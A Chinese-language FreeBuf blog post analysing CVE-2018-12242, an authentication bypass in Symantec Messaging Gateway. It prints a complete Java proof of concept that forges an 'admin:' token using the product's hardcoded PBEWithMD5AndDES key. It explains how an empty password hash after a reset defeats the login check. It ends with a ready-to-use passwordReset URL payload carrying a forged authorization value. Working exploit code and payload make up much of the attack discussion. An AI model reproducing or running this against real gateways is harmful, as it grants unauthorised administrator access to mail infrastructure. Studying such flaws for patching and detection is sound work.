freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2018-12242漏洞分析
2019-03-13 08:33:34

之前有篇文章翻译了CVE-2018-12242

手里有symantec的源码 于是立刻就分析了    存在手里一直没动


先上poc

import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.PBEParameterSpec;
import sun.misc.BASE64Encoder;




public class Test{
       public
static void main(String args[]){
              try{
                     //System.out.print(123);

                     byte[]
salt = new byte[8];
                     SecureRandom
random = SecureRandom.getInstance("SHA1PRNG");
                     random.nextBytes(salt);
                     PBEKeySpec
keySpec = new
PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-=".toCharArray());
                     SecretKeyFactory
keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
                     SecretKey
key = keyFactory.generateSecret(keySpec);
                     PBEParameterSpec
paramSpec = new PBEParameterSpec(salt, 1000);
                     Cipher
cipher = Cipher.getInstance("PBEWithMD5AndDES");


                     cipher.init(1,
key, paramSpec);


                     //byte[]
salt;


                     BASE64Encoder
encoder = new BASE64Encoder();


                     String
saltString = encoder.encode(salt);


                     String
text = "admin:";


                     byte[]
ciphertext = cipher.doFinal(text.getBytes());


                     String
ciphertextString = encoder.encode(ciphertext);


                     System.out.print(saltString
+ ciphertextString);


              }catch
(Exception e){


                     System.out.print(e);


              }


 


       }


}





核心还是在加密解密这块


image.png


加密算法一直是固定的

但是FIPS186PRNG这个算法太古老了

 

只能拿SHA1PRNG代替


              image.png

接下来分析一波漏洞触发点

 

token = BrightmailDecrypt.decrypt(token);

 

接收到token用公共的解密方法解密

 

解密之后按  “  :  ”

分割 前面为username  后面为 passwordhash

 

然后按username做sql查询

 

然后调用getAdministratorUserByName方法


image.png

 GetSQLAdministratorUserByName生成sql语句

然后查询

接着对比

如果user为空会抛出一个不存在该用户的异常

如果passwordhash与查询到的passwordhash不一致也会抛出异常

 

那么passwordhash是什么呢

在开启重置密码选项后 该字段为空。。。

然后创建一个admin session的正常操作….

 

 

那么最终payload为

 

/brightmail/action2.do?method=passwordReset&authorization=S9m%2bdmCBN8k%3dfot%2fxYG299k%3d



image.png

# CVE-2018-12242 # Symantec Messaging Gateway
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者